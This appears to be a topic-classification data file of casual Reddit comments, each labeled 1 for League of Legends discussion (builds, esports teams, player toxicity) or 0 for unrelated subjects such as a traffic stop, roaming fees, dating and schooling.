0	A couple years ago, the ignition for my roommate's car got messed up and the only choice was to drill it out and use a screwdriver until the new ignition came in. While driving the car I got pulled over by a cop. I was freaking out. There was no way this was going to end well. The back window of the car was broken, there was a screwdriver sticking out out of the ignition, and there were still metal shavings on the floor from drilling out the lock. You'd have to be an idiot not to think the car is stolen. The officer observes this and asks me to explain. I tell him I'm just borrowing my friend's car and ask him if I can call my roommate to prove I have permission. He says yes, I dial, and hand him the phone. All she said was one word, "yes" and I was able to go on with my day. I still feel like I should have been arrested.
0	This is probably not as bad as me. I was in Paris once for a 15 hour layover and decided to visit Versailles for a few hours. When I tried to take the Metro back to the airport, they had some kind of hour long delay. I had only given myself an hour leeway, so I was going to miss my flight back to New York if I didn't get to the airport in time. So I decided to go outside and fetch a taxi. After about a dozen or so taxis (both empty and full) ignored me, I remembered that I had Uber on my phone. But Uber requires that you turn on data roaming. I didn't want to miss my flight so I decided to eat the few dollars of data roaming that Uber would cause. I also downloaded all my emails with the airport wifi beforehand, so I didn't think it was going to be so bad. Once I turned on the data roaming I realized that I made a huge mistake. Someone had been texting me dozens of pictures at 1-3 mb each via iMessage while I was at Versailles. Once I turned on the data, it grabbed about 50mb worth of pictures. You might think that that's nothing. But data roaming fees are: $.0195/KB ($19.96/MB). The Metro also started moving again a minute after I turned on data roaming.
1	Curse has always had a weak bot lane since forever ago. They always knew their bot lane was weak, but they've tried to cover their weak spot by focusing harder on the solo laners. It's never been a secret that if you want to win a game, you just trash their bottom lane because to be quite honest, pretty much any bottom lane can beat them.   I like Elementz I really do, but I know and he knows that he's lesser support than most of the other supports in LCS (at least mechanically). He redeems himself with his morale and encouragement to his team.  I honestly don't think he or Cop can should be replaced because they fit the role of the team perfectly which is to get by. They're not meant to carry or do anything special. The way Curse got around this was by never letting their bot lane fight a straight 2v2. Saint would give Jacky or Voy the torch to carry on, and Elementz and Cop would be there to help out.   I think the way this was handled was quite bad though. Saint/Elementz should not be letting this leak to the public. It's very bad for Curse and there's no reason to bash others like this. They need to take care of their problems, and Liquid needs to step the fuck up instead of playing buddy buddy with Saint.   Anyways it's 3 AM and I can't think properly so yeah. I feel like this was a rambled thought, so now it probably sounds really shitty. Also when he talked about nobody voting for Elementz, no pro player picked Jacky either except for Jacky himself.
1	I have to agree. I don't usually play blind pick, but every time I pick something extrordinary it gets countered by some obvious counter. Every time I tried to jungle with Rumble enemies had to have two trolls who picked smite, with one of them being Shaco and the other one being Shyvana. Almost exact same situation has happened to me two times. The  other day I grabbed some freshly bought Olaf to enjoy some top and bam! wild Teemo appears. Second game? Same thing.
1	I'm only STILL a TSM fan because of Dyrus. When he leaves I might stop caring about TSM, but Bjerg is growing on me. I know a lot of people feel the same way. Baylife for life!
1	No, this game changes way too much. For instance I'm going to put them on the same category with CLG/DIG/TSM/Veolicity for the next split because season 4 balance changes might fit one team better than others. I take the game one split at a time and ignore previous split performances for that exact reason.
0	School should teach the lessons the state or whatever board is in charge decides need be taught.   People bitch and whine because public schools didn't teach them how to rent a car or safe sex. School is supposed to get you prepared for knowledge your parents aren't necessarily able to teach you.   Unless your parent is an Engineer, there's a good chance that they aren't going to breeze through teaching you advanced Mathematics. That doesn't mean that your parent can't teach you proper money management.
1	To me it looked like they wanted to give up all drags until the fifth one just so they could get their carries farmed and it seemed to work as long as they didn't sit in an equalizer but alas they played their rotations and everything late game terribly.
0	Other women experience reductions in libido while on the pill, or decreased lubrication. Some researchers question a causal link between COCP use and decreased libido; a 2007 study of 1700 women found COCP users experienced no change in sexual satisfaction. A 2005 laboratory study of genital arousal tested fourteen women before and after they began taking COCPs. The study found that women experienced a significantly wider range of arousal responses after beginning pill use; decreases and increases in measures of arousal were equally common.   [SOURCE](
1	Mechanical skill of the game and game knowledge itself is completely different.   Morello probably knows heaps about League cause its his job, however he doesn't have the best game mechanics because he is always watching from the sidelines and only plays the game casually. So this guy has great game knowledge with bad mechanics.   On the other hand we can have a godly game mechanics player or someone with insane reaction rates and what-not, but they don't have a single ounce of knowledge on the game. They'll obviously be a complete flop if they only know how the champs that they have played.   Then we have the successful players, reasonable or above average game knowledge with solid game mechanics and know their way around the game. These players take the game more or less seriously compared to the other two groups who haven't taken the game to heart.
1	If you are watching a League of legends stream, you are taking the risk of getting spoilers, it can't be avoidable and the casters will not pause everytime they have something to say about some earlier games that they might give spoilers.  It's the same as going to twitter or facebook, you can't expect someone to not talk about something.
1	When starting to jungle Udyr is probably THE safest pick, he deals ok in jungle duels, has fast clear, cc and is tanky. He is basically the jack of all trades a very easy jungler to feel comfortable with. (If you want alternatives Nocturne is also a very strong jungler as well as Nautilus)   If you wanted to jungle Udyr I recommend (for new to jungle):   Runes: Attackspeed reds, Armor Yellows, Magicresperlvl blues and movespeed quints (they are expensive, but you can use another quint for now)   Masteries: 0/21/9 Picking up both reduced damage masteries and armor in defense (minion and incoming) and runic affinity in utility   Skill order: RWRE (Then max RWEQ)   Item order: Start off with boots and some health pots > HoG > Phage (or aegis) > Wits end   This may not be uber standard but it will make sure you stay alive with your buffs if you misjudge something due to the early health and slow procs are cool! From here you can grab damage items like trinity force or go more tanky with randuins and banshee's veil. Just be aware that wits + Tforce is all the damage you should get (You need to tank for that ad carry!)   Route: Start at blue (take wolves if you can get some help damaging them) then go over to wraiths, golems, red then wraiths again to get level 4 (your cc!) You can then gank the two lanes either side of wraiths or do wolves and go to the other lane or mid.   I got counterjungled!: Don't panic! If it's earlygame they will likely have stolen one of your major buffs, this sucks for you a bit, but the good thing about udyr is that you can get back into the game quickly by clearing small camps and getting some good ganks off, just be careful for future counterjungling at about 7:10 and 12:20 when your first buff comes back up, you SHOULD be there! (If they are clearing small camps grab a ward to plop by wraiths and kill him with your mid!)   Counterjungling: If you feel like your enemy deserves your bear goodness go steal their big wraith with smite from time to time, this is a safe counter jungle for you to do often! If you want to get a major buff of theirs remember whenever they start their buff will be up 5 mins later (about 7:10) so grab a ward and put it near that buff you can safely take it as soon as it spawns then keep time on it to control it for rest of game! (Be wary of lanes coming to get you if they see you going there, map awareness is key)   Experience: A lot of jungling you will pick up as you play, just try to hit about 50cs per 10 mins and gank when you can, this is a pretty good cs target and you may not hit it for a while but be sure to balance cs with ganks to make sure that you stay in the game.   Ganking: Don't delay if it may be warded! if you are going bot by river bear stance straight into them, don't wait in the bush and give them time to realize you are there, go straight for them and give a healthy ping so your bot lane goes onto them as well. If you want to gank by lane (where you go into the big bushes at the side) take it slowly and make sure you are not seen then get the surprise, a flash wasted is a successful gank by the way!   Hope that helps!
1	I always hear about how people find toxic people in tons of their games, but I've rarely ever found someone that was actually being a jerk.  To be fair, I mostly just played bot games until 10 or so, so I probably avoided many smurfs that way, but I have also played a lot of normals and a fair bit of ranked, and have never had anyone get mad when I make a mistake (other than flinging someone the wrong way as Singed and getting people on my team killed, which kinda was a really dumb move on my part).  In ranked games (at about 1300 elo) people see  pretty chill in all my games.  I decided to jungle since no one else wanted to, even though I'm not that great.  The first time I try to gank, the other person took pretty much no damage, and second time I tried I died, and the other person escaped with low life.  Even though I felt bad about it, no one on my team really said anything too bad, and people even encouraged me, and told me not to give up.   That being said, I have had some humorous games where people were really creative in telling me that I was playing very bad.  "Hey, Riven, I bet you'd do pretty bad in a petting zoo...no feeding allowed there." or "You could end world hunger if you had gone 0/11 to Africa instead of MF."  Although they were insulting me, they were doing it in a lighthearted way that gave me a great laugh.
1	I've got to say, I don't really remember anyone playing Shaco in a tournament. That's not to say they haven't, but I watch a lot of tournaments and can't really remember it.   The issue there is, I think, that none of the top tier junglers have ever put the time into being a truly exceptional Shaco.   Shaco takes dedication other champions don't and while they all say they want to play Shaco in tournaments and think he has potential, the kind of time commitment Shaco takes is difficult to give when you are playing at a professional level.   If someone like Diamdprox put 700 games into Shaco I reckon we'd see him do terrible, terrible things to people.   But then he's put 700 games into one champion and after the first game people will just ban it. Then his other champions probably aren't up to the same level because him and his team will have had to put so much in in order to be able to run Shaco effectively.
0	Yeah, I see it more as they are insecure about that particular part of their own personality so they are quick to jump to ridicule any kind of "alpha" type behavior.   Now if I went on to tell the honest truth that I have been in fights when I was in the navy before and had to reset my own nose in a bathroom of a night club (when I got decked) I would just get ridiculed more because it would touch on that specific insecurity of theirs even more.
1	To be fair, double Morellonomicon's in a specific scenario on Azir makes sense.   You want to scale Azir with CDR since CDR gives you the ability to get out your 3 soldiers and works off your passive (+1.25% aspd per 1% CDR).   For an AP mage, there is actually a pretty limited selection of items that give you AP+CDR.   The two main choices are Morellonomicon and Athene's. If you don't have mana problems, you didn't rush Athene's.   Your other choices are: DFG, Nashor's, Iceborn, Twin Shadows, Frost Queen's, Banner of Command, WotA   If you want to aim for max CDR and you didn't take CDR runes, there's a good chance all the 10% CDR items are off the list unless you're building multiple so that takes off everything from that list besides Nashor's.   So in Bjergsen's case, after having Morello's already, his choices are: Morello, Nashor's, Athene's.   Morello costs 2100, Nashor's costs 2920, and Athene's runs 2700. Azir probably does well with all of these in specific builds depending on how you play him.   I didn't catch the game so I don't know the specifics on Bjergsen's purchase of a 2nd Morello.   Now, consider the possibility that when Bjerg purchases a 2nd Morello, the team made the call that there was a very high possibility a teamfight was imminent and Bjerg's gold situation afforded him a Morello, say he had 2200g. It would've taken him roughly 3min worth of minion wave + passive gold farming to make up the difference to afford the next cheapest best item in Athene's.   If the call was made that an important fight was going to happen in the next 3 minutes, the question is: do you sit on 2200g or do you buy a suitable item? It makes sense to buy a 2nd Morello.
1	21 offense is rather questionable on Ryze   Past the 10% magic pen--ask yourself, 'What does Ryze get out of these masteries?   The physical damage and Armor Pen ones are obviously useless, and Ryze gets very little out of the AP (Blast/Archmage). Havoc is okay, I don't personally get it, but I can see it being a personal preference thing. Executioner is a pretty good spell, BUT you have to skill four points each into Blast/Archmage, which are next to useless for Ryze.   Is Executioner worth having those 8 essentially  wasted  mastery points? With Ryze being the tanky-type character he is, there's no reason not to skill into defense.   The problem I have with utility, as I mentioned above, is that going too deep into that tree, you have to waste mastery points on those weird support-type skills.
1	I think there is enough incentive to be among the best in the world that if you said to players like Froggen, like Rekless etc. that "we can make you good enough to compete with the best teams in the world, but you have to eat, sleep, train and live like a top Korean team to do it", that a not insignificant number of players would say "sign me up" without a second's hesitation.   Think of it this way, we have two training setups, A and B. A works well for Koreans, B works well for Europeans. Your logic is sound if Europeans cannot work under A (and Koreans cannot/do not benefit from B), that Europeans should go with B. But if you have say 10% of Europeans who are willing to act like Koreans for the sake of being the best, for that group of players A once again becomes the best.   For sure, some players might fall out of love with the game if they have to live like that, but some would be prepared to make that sacrifice to be the best, and I think someone like Froggen would certainly be prepared to live in a Korean style gaming house, if it were applicable to EU regarding infrastructure, organisational sister teams etc.
0	I think the friend zone is a very real thing were there is no sexual attraction but a general interest.   And I'm not speaking for all guys here but the friends that I know have this problem where they think they are either great long term boyfriend material/ husband material but fail to be interesting or  show  that they are interesting.  Show  is an important part because talk really is cheap, you have to show that you are interesting by being active and reactive.   The problem that a lot of these types of "nice guys/girls" is that although you man be stable and reliable, what good is that if you aren't fun or attractive in some way?  (doesn't have to be physically attractive, could be character or interests) Trying to attract someone by saying that you're a loyal or dependable person is like trying to market a job position by starting with the 401k package. Yes it's important, but it also shows there's not much else to offer and the relationship is probably going to be boring. There's a reason why most companies try to sell their positions as fun and fulfilling rather than it has fantastic benefits.   Another point is that dependability and niceness  can only be proven through time.  Can you guarantee that you'll be dependable and won't cheat? What if you're passive aggressive in a relationship and keep things bottled until you snap? Again talk is cheap here, and really these characteristics are meant to be discovered, developed, and worked out as the relationship progresses.
0	K so this thread is huge and this is relevant in more than one comment thread... so I'm just gonna shove this in here and watch it be buried. Yes, as a hivemind /r/atheism can go a bit overboard or be generally obnoxious, overbearing, and intolerant and thats  not right . However, a place where a community can vent such frustrations is quite therapeutic for those of us who had parents/communities which were obnoxious, overbearing, and intolerant towards atheism. I was MAD at religion for a long time and venting on that subreddit helped me keep it away from my loved ones whom I respect and gave me the tools to express my beliefs to them in a rational and prepared manner. For myself, and probably many others, that sub is the one accessible place where atheists congregate. We can be arrogant, and like the rest of you need to be put in our place or corrected every now and again, but usually you will see that voice in the comment threads in the sub its self.
1	I never even considered changing his new Q after testing out New Kassadin, but now that you mention it, it seems like a good tweak. The rest of his new kit seems pretty solid to me though with the Missing % Mana refreshing W, a shield, a slow, and mobility. AP vs Mana felt like a problem early game, especially with the extremely high mana cost stacked R; it was like "Do I build mana so I can actually use my ulti? Or AP so I can actually kill someone?" But it balanced out late game after I finally got my RoA and Archangel Staff. Regardless, got a quadra kill near the end and the whole enemy team proceeded to flame me for playing Kass, tell me that im "So good" at the game, and cry about how Kassadin is broken as fuck with his mobility.(Mind you that Talon, Akali, AND Lee Sin were on the enemy team. Talon you're fine. However I shouldn't have to read an Akali or Lee Sin calling Kass R OP because they don't get punished as hard for freely using gap closers whereas New Kassadin has to stare at his empty mana pool and cry to himself to sleep if he gets Riftwalk-Happy)
0	Someone ought to invent cigarettes that keep the flavor of regular cigarettes but are way less addictive and way less harmful (when used in moderation). This way you preserve the smoking culture but you bring it down to alcohol levels. You would then have to develop a clear, functional system to tackle alcohol addiction (and thus cigarette addiction too).
0	Its difficult to not feel superior given that America literally feeds every other country and that they would all die without us.]( While the rest of the world starves, we have so much plenty that our biggest problem is overeating. [Take a look at the Olympic medal count, take a look at which country made your computer, which country won the most Nobel prizes, which country has the most top 10 universities, which country saved the world in WWII]( list goes on and on.   [America is exceptional, its the country that is by far the apex of civilization.]( We are so much better than the rest of the world that its just insane, it really makes us appear like God chose us to be this beacon of light that the rest of the world strives to be like. That's why they all eat our McDonalds, wear our jeans, listen to our music, watch our movies and sports, buy our Apple devices and hate on America on the Internet we created and allowed them to use.   America is the greatest country in the world because it has the highest GDP, the most powerful army of all time, dominated the Olympics, science, technology and has the most millionaires. America will be remembered 2000 years from now as a modern Rome that took humanity to the next stage by opening up the space above us, we will be the first to land of Mars after we were the first to land on the moon and we will be the first to create a colony on another planet. When we won WWII, we were given the reigns to this planet and we have since then created the most peaceful and prosperous 50 years in the history of the world. [The rest of the world hates us because of our greatness and how we make them feel inferior by towering over them.](   America has achieved more in the last 100 years than the rest of the world combined and has advanced humanity more than any other civilization. The sheer power, influence, dominance and advancement is staggering. [It makes us feel so powerful, its like you have the biggest dick in the world]( and the rest of the world is jealous of you swinging it.   [This country bleeds greatness through and through and its alright to feel blessed to be one of the people lucky enough to be born in the greatest country of all time.]( Your dick now feels huge.
0	even though you may be a good/chill cop, doesnt mean every other one is. change of a public image starts with you, maybe more people would be in agreement with officers if they understood the mentality of average citizen and their predetermined views of the roles of the police in today's society. Especially with the United States becoming a military states, people are more apt to connotate all police with the concept of citizens losing their god given rights to freedom and the pursuit of happiness.   I vaguely remember during the occupy movements that some people were asking protesters to look nice and civilized because other wise they wouldn't be taken serious by these big huge wall street bankers. This pertains to the concept that demand for change will be taken more seriously if both parties understand each other, regardless if it is not fair or even. The will to change a whole corrupt tree of disparity starts with the seed that is planted. Be that factor that changes our view of you guys and together we can live in peace with a respectful relation. The police is meant to keep you safe within our own domestic country, that does not say take control into your own hands.
0	Happened to me, too. Teacher marked down half of every problem because I didn't show work so I talked to her after class asking what exactly she wanted me to show. She assumed that I had another sheet I was using that I threw away after the test. I solved a couple problems right in front of her, proving I didn't skip any steps, and she didn't care after that.
0	Because OP:   a) Used a picture previously popular on reddit   b) Make an implied buddy-buddy relationship between two members of the feline family   c) Used a meme to elicit one of the strongest connections in the human brain other than smell (fondness for something being cute, evolutionarily tied to our children from us in a protectorate manner), albeit incorrectly.   d) Made a pun, albeit not the best option.   Plus the time it was posted (~4-5pm Eastern Time, GMT -5) is a high time for reddit, so there's bound to be more people on. And with students finishing up finals and people coming home from work around that time, people might be in a dull sense of mind and would upvote really anything. Plus, this is a default subreddit, and most people are too lazy to remove it, and so it appears on their front page; if it's already on the front page, it must be good, have an upvote.   Once you break it down into tactics, it's really not that hard to figure out why a misused meme with the lack of a brilliant pun has so many upvotes. Either OP is crazy smart and cunning, or stupid and lucky. I'm going with the latter.
1	My favorites include Morgana, Galio, CHO MF GATH, Nunu, Zilean, Swain, Ryze, Gragas and Amumu.   However, for must try must succeed champs, I think that CHO MF GATH is a blast to play. He is in one of those debatable positions of "oh is he tank, off tank, pure AP, oimnsoldifm." I play him somewhat AP Tank...and explain my rationale and some ideas in the event that you have or haven't tried the monster.   He is definitely one that can fulfill any role you really need. If you need a pure take-no-damage tank 0 21 9 works, I run 9 0 21 with HP quints, MPen reds, Armor yellows and scaling MR blues. I like to take a mana crystal and pots first...but he can pretty much succeed with anything. Scaling q e e w e r...scaling your spikes gives you some of the best early AOE auto attack damage: this lets you last hit and regen HP and mana from your passive so you can stay in lane forever.   My item build, again varies per game, but RoA and 3 speed boots tend to be pretty much my core. Bveil, frozen heart, deathcap, Guardians, FoN all work pretty well on him also, but build according to team comp. RoA gives him extra bite (huehue) and not being one of those silly no damage-never-kill tanks.   Land your rupture. This will bring everything together and if you can yell "UP YOU GO!" at chumps, there is a high possibility of that hero just blowing up after. Feast often and early if you don't think you can get a kill so you have full stacks and can just beast wherever you want to.
1	I haven't been following LoL for very long (since about mid S3) and I have to say, the first time I heard about/saw some analysis from Monte I thought "oh, this guy seems to know what he's talking about. He seems to be well informed on the Korea scene and wants to see it applied in NA". then I found out he's the coach for a team, okay that makes sense. Then I found out he's a caster for OGN, hmmm, that seems odd considering the time differences.... Then I found out he lives in Korea: Wat. How do you coach an NA team if you live in a different continent??
1	eh if you think about it "face to hate at" is kind of a valuable asset for a company like this.  consider, for  every  nerf, rework, or tweak, the company  will  face backlash from people who like how the champion currently works.   take the whole lee sin thing.  as a skarner main i fucking hate lee sin.   lee's early game strength and movement advantage bends skarner over.  and because thats my perspective i think nerfign lee's early game and balancing his power curve is great, i'm thrilled.  hell they've already nerfed elise, all we need is kha and i bet skarn will be competitive in pro play.   but everybody who owns lee and loves shitting over the enemy jungle all early game is pissed, and is latching on to the whole "lee sin is the most balanced champ in the game" statement, and every pro that like's him's bitching.   i think the whole "most balanced" shit is completely false because his mobility is so incredible and i think early game strength is more powerful than late game strength overall.  late game strength doesn't have your team going "surrender at 20" five minutes in.   to get back to the point a little, those of us who are happy about lee getting nerfed  could  be in the majority, who knows, but we have a million times less investment in it than the lee sin mains.  so almost all the "community feedback" about a nerf can be assumed to be negative.  those of us who are happy about it don't start threads of joy demanding riot keep the nerf in place. No, we think [good]( and maybe smirk a little.   so having a "blame lightning rod" maybe diverts some of the attention from the company name, and instead onto that jerk ghost crawler who kept changing which deathknight talent tree was best by rolling a d6.  an almost "celebrity personality" to give a name to blame, who is also good, or at lest decent, at explaining to the community why changes are being made.
1	I couldn't agree more. It was incredibly painful to read his rage at countering burst damage...it seemed to upset him that to counter talon, you needed to survive the lane phase and build armor and hp. Or versus Galio, you needed to accept the fact that as an ap mid you won't be able to kill him alone, and as a result the counterplay is to farm as much as possible and then work together in teamfights to overwhelm him.   2/3 of galios damage comes from skillshots. Talon, like leblanc, is inherently squishy and as a result falls off late game. When the time comes that you can no longer combo the AD/AP carry in one shot, you have fallen off.   Honestly I see where he's coming from, and the point he is trying to make has merit. I think he just struggled in how to go about wording it, and utilizing the right examples. It is LESS FUN to counterplay Talon as Lux(race to WTFBBQ instaburst @ 6) then it is to counterplay Irelia versus Fiora. There are some matchups that are just SO FUN to counterplay that it makes others feel bland by comparison. This is what happens when the matchup relies more on build order/ganks/gold and less on a champions kit.   Starting cloth armor 5 pot as Akali versus Darius, and only using your Q to farm knowing that you cannot win any trades until you snowball off of a teamfight or get a gank? Unsatisfying.   That Irelia/Fiora matchup? As Irelia, stun during fiora sterioid, turn on true damage, time your ult to counter OR prepare yourself for hers, live with less then 100 hp, type WORTH in all caps all chat...all you need is some oral going on under your desk and you've reached the pinnacle of satisfaction.   As for his point on specific champions being unviable, I would say that almost all champions have a niche role or situation where they are the perfect pick. Who said 6 months ago that AP Yi was competitively viable? Last patch, AP Yi nerf after Alex Ich taught the world a lesson. The recent amazing game in which GSG ManDu whipped out jungle heimer in game 5 of NLB and blew everyone away within 20 minutes, the casters talking about how GSG said they had prepared a specific strat for blue side if the picks and bans were right...   Malzahar, "competitively unviable" but a champ built around dominating the laning phase and pushing fast with his supression ult and sustaining visions. If you're in a situation like Gambit Gaming was a few weeks ago @ IEM Katowice, and know that you need to pull out a win in under 28 minutes in order to advance? Would have been a great pick, but Khazix was open...lol. $$$ says we'll see more champs that people say are "unviable" show up in competitive play for various legitimate niche reasons...Volibear today, support Garen tomorrow?   Hopefully people see my point, because I saw Hashinshin's - I just wish he had done a better job articulating it.   EDIT:
1	What everyone needs to understand is there shouldn't be leeway on toxic behavior based on how toxic they are from one game to the next. Of the games in EDwards case, I saw one that was toxic, I would hit punish regardless. Player toxicity isn't meant to be judged in the sense that someone can be 'somewhat toxic' and so on, it is qualitative in the sense that you are toxic or you aren't toxic.   Once again using EDward's case as a source of data, he had 5 cases. I saw toxicity in one. However, this shouldn't lead you to assume he was only toxic in 1 of X games, if that were the case he wouldn't of been reported much and as such wouldn't be on tribunal; we all know you need to be reported in way more than 5 games to be on tribunal, the 5 cases presented are a sample. I generally see it as this:   Player A has 2 toxic cases of 5 in a tribunal review, this represented as a percentage is 40% of the sample given. This can easily mean the player was toxic anywhere from 0%<x40% toxic and potentially even more, assuming the sample is random. Bear in mind that if one case is toxic in the sample presented, the player is more than 0% toxic and as such should be regarded toxic.   There is no excuse for toxic behavior on this game and that is why you should be pressing punish if there is even 1 case of the 5 presented showing toxicity. You are in control of your keyboard the entire game (I would hope, and even if you aren't it is still your responsibility) and as such you control what you type; if you type something toxic, you typed something toxic and as such you have committed toxic behavior, it's that simple. If other players are toxic you should mute them or not rise up to it, this is something that is widely used in real-life and is easily applied to League of Legends.
1	He'll now become a troll king if the journey into frelyord is to be believed.
0	A man should learn to detect and watch that gleam of light which flashes across his mind from within, more than the lustre of the firmament of bards and sages. Yet he dismisses without notice his thought, because it is his. In every work of genius we recognize our own rejected thoughts: they come back to us with a certain alienated majesty." - Ralph Waldo Emerson
1	I main syndra and have tons of games with her. She's good because you get to be effective in skirmishes even after you have used your full burst. When fed enough you can easily oneshot a squish with q e r combo and if you land a good stun (which is pretty crucial actually) you can easily crush a small team fight almost by yourself. The team has to clean up but you can do all the "rough stuff".
1	This is something that a lot of teams have started doing. It really goes back to the old sustain farm bot lane and why it was so successful.   If bot lane can just sit in lane and farm with wards to make sure they're not going to be ganked, it just becomes a farm fest and pointless for a jungler to go there.   This makes mid or top. If you have a mid with good escapes / high mobility, it means you don't have to baby sit their lane either.   So what the Jungler will end up doing is just camping top and making one person their target and making them useless (low levels or just making them scared to get into a fight).   It worked every time TSM did it and it works when teams like MM and m5 did it was well. Which is why I cringed everytime I saw a jungler other then m5 pick mundo, they don't Gank well with them and he becomes useless is team fights.
0	22, white, male. Healthy weight - we don't have quite the extent of obesity here in the UK as in the US given many redditors are American (most populous English speaking country in the world - makes sense (excl. India)), but don't worry - we're next! - give it 5-7 years and I've no doubt I'll be your stereotypical redditor. I don't see my healthy weight surviving the microwave meals, pizza and beer diet that is par for the course at med school. We're always saying to patients - healthy diet, low fat, high nutrients, exercise - after which we usually go home, have a pizza, have a smoke on the way back to hospital, count the aforementioned 5 min walk as "exercise", and begin the night shift with the pager bleeping. We're enormous hypocrites.
1	I agree. Shit after one game in solo queue with people I've never met or will deal with in the next game or later I can get frustrated and pissed.   Living together with the same group for so long and opening up to them, makes raging easier because your comfortable with who your around.   You don't rage at a new job because something went bad or you got to work overtime because your new and don't want to get fired.   Once you get comfortable around your co-workers you slowly progress into "Fuck this shit, why are you working so slow".   Then after awhile you feel your better at the job than everyone else and feel you can tell them what to do, even if your not the best. Which is where Regi is at right now. Messing up his job and telling everyone else what the problem is and how it's clearly not his fault.   Just think of it as a Ordinary Job, because it is.   Thing is in a normal job you have someone in power above you to tell you what the problem is and how to fix it, or to shut the fuck up and pay attention. Problem with a LoL team is they don't have that kind of Baby sitting by someone or the threat of losing their job.   edit:
0	I've never seen people tamper with food, and I've worked in several restaurants. No one asshole customer is worth losing your job. One night a cook had to make a dinner for her ex husband and his new girlfriend. If she didn't tamper with the food, you'll probably be safe.   Then again, some human beings are just jerks and wouldn't blink twice about getting fired for a chance to do something awful to another human.
1	you put a tanky lane bottom....something that can just dominate a couple of squishies...something like blitz/alistar....blitz and alistar dont rely on farm as much as the enemy carry does, they can force fights early and disrupt the farming phase...even if they dont get a kill, as slong as they keep cs low, they are ahead...they are very immune to ganks due to large amounts off cc while making their junglers ganks much more potent   the problem here is it leaves a squishy vs jarvan/irelia/SQUISHY KILLERS   this is why i like vayne...she is generally terrible in lane, but vs someone who cant touch her, someone that will get knocked back and kited everytime they try to jump on her, she becomes very strong and snowballs hard   i also like champs with amazing harass and escapes, such as corki and caitlyn...this si generally where your weak, but having a champ like caitlyn who can dominate pretty much everyone and is very untouchable really balances out your lanes   you keep ap carry mid, there was never much of a problem there   now, the eu style composition nearly requires them to have a tank jungler, or at least a jungler with a great initiate   this means they must use, amumu, ww, malphite, rammus, shen...mostly weaker junglers with the exception of ww and amumu   on the other hand, this style would allow any range of junglers, sometihng like amumu or ww would still work, while getting an anti-carry like nocturne or olaf also seems very strong...in fact, by banning tanky junglers, you would be nearly crippling the enemy team in terms of what they are capable of doing   now yes, top lane somewhat functions as a tank/initiate, but until they farm up that tri-force, they are fairly vunerable, and  their initiates compared to a true tank are fairly useless...comparing a tank like malphite or amum who can lock down a whole team, irelia/jarvan will jump on someone and just get knocked away by blitz/alistar and the intiate becomes a wipe
1	I got Arctic Ops Kennen on release. I own Astronaut Teemo legendary, and if it's not Rocketeer Tristana then it's not worth it.
1	It was with a very specific game plan, and their whole early game strategy was about helping the braum survive. They then won with roaming thresh+braum making it so Kog never ever died. It's also important to note that Braum was like 20 cs behind the enemy jungler at every point in the game.
1	You see, there's a small timing between the turret shot landing and it firing again. He got out of the turret before that timing was over, so it didn't shoot again. Not that hard to see, tbh.
1	I think riot should make a Urgot rework based around the drawing. Instead of having Urgot as an ranged ad bruiser they could make him just a melee bruiser. Also making him a support wouldn't be a bad idea either. Generally I think Urgot isent played because of his looks, his lore is bad ass, his kit, I think, is bad ass and same goes for his voice. Only problem is how he looks. Change the lore, change a few ability, his play would go up a shit ton.
1	I've been playing since s1 and didn't play ranked until this season >.> had something like 1500-2k total games before doing ranked. I guess I was plenty experienced because I was placed mid silver(right before the switch to the current League system) and went from Silver 3 - Gold 5 pretty easily playing only support with the occasional Rammus jungle.
1	I watch the stream because you are an amazing guy. I love watching you rage on solo queue or when you make "THE PLAYS" with OddOne. You have a great music selection, I even made a Gorillaz playlist on my Pandora because of hearing it on your stream, i knew who they were and liked their music i just never thought to put it in a Pandora station. You inspire me to be a better League player. I admit I do take somethings I watch on your stream or videos and try them out in my games, because I main top too, and they are fun. Like playing Volibear with Surge, I had such a fun time doing that. I've only started watching streams a little while ago, and I'm sad that I didn't earlier because I've been playing for such a long time. I know there is a chance that this won't really be seen by you, but if it does then I hope you can enjoy my words from a simple guy. You are always entertaining to watch, at least in my book. I even leave your stream on sometimes when i'm playing just to hear your audio, whether I'm playing solo queue or with friends. So if you decide to try and entertain more or even just stay the same i'll still watch your stream.
1	Lots of people here saying "click the terrain, not the entrance". Yes, that is how you do it. However, for thin walls like baron, second turret jungle wall, and a few others success rate decreases dramatically, often pathing us around the wall during a team fight. This could be solved by a larger area to click, right at the entrance of the tunnel. Someone said a meep that takes you through, I think a chime would be more appropriate since they speed you up. Meeps would definitely be cooler though.
0	Having accidentally gotten out of the friend zone several times, here's what I've learned.     ALL girls like nice guys. If you're nice, there's no reason that a girl can't find you sexy. Unfortunately, many guys think that nice means that you have to agree with everything she says, never look out for yourself, never talk about sex, and be a needy relationship guy. Would YOU want any of that in a girl?     Assholes can be boring too, and "nice guys" always think that assholes are the victors. Nope. Only the interesting ones. Think about the stereotypical lead guitarist who rides a motorcycle. He has legions of fans that come to watch him perform at night, and he rides a fun machine. He may be a dick to old ladies during the day, but damn - women want to be with him and will deal with the asshole qualities. If he was actually nice too, it'd simply be icing on the cake.     Most guys who identify as sexless "nice" guys are boring. Believe it or not girls like sex. But if you try to build the right situation or subtly lead her to sex or a relationship, you run the risk of making her think that you're being manipulative (even if you're not). Some girls will just shut you down then and there. Other girls look at all you've been doing and go "Wow - FINALLY! A guy that can be a good friend to me without wanting anything more!" BOOM Friendzoned.     I think that women probably can find even fat obese guys sexy as long as they're interesting. If you're on your computer all day and have no friends or outside social life, you don't fall into this category. If you're outgoing, fun, interesting, have hobbies, would rather go out than stay in, AND YOU'LL GO OUT FOR NO PARTICULAR REASON, and you live life fearlessly - then you'll look attractive to women. You don't need to play games (pickup artists), or be skinny. One of my buddies is quite obese, but he's one of the coolest guys I know. I've only seen pictures of his wife, but holy shit - she's hot. And tiny. And you know what? I haven't been buddies with him long, but I can tell that his personality, outgoingness, and the way that I can believe him when he shows me a pic of his hot wife tell me that those qualities are exactly what got him a hot wife (now I have no idea if she's a good wife or not, but she's definitely hot, and 2 kids prove that he's sexing her up).     Being friendzoned permanently by some girl means you're officially out of the running. Crap. Only 3,499,999,999 women left!! WHAT ARE YOU GOING TO DO!?!?! If you're in the friend zone, why not ask her to go out with you to hang (which is what friends do), and she can help you meet some girls (girls like guys who have girl friends by the way).
0	I used to overdraft my account all the time.  As I have grown up I have become a little more responsible with my money and check my accounts almost every day.  However, I recently made a payment for my student loans and chose the wrong account to take it from (you have default accounts listed when you chose your payment method and I was not aware I had already put in the wrong one).  BOOM!  $35 overdraft fee.  And, I am pretty sure I have overdraft protection (the funds come from a different account just in case).  Still charged (fucked) me.
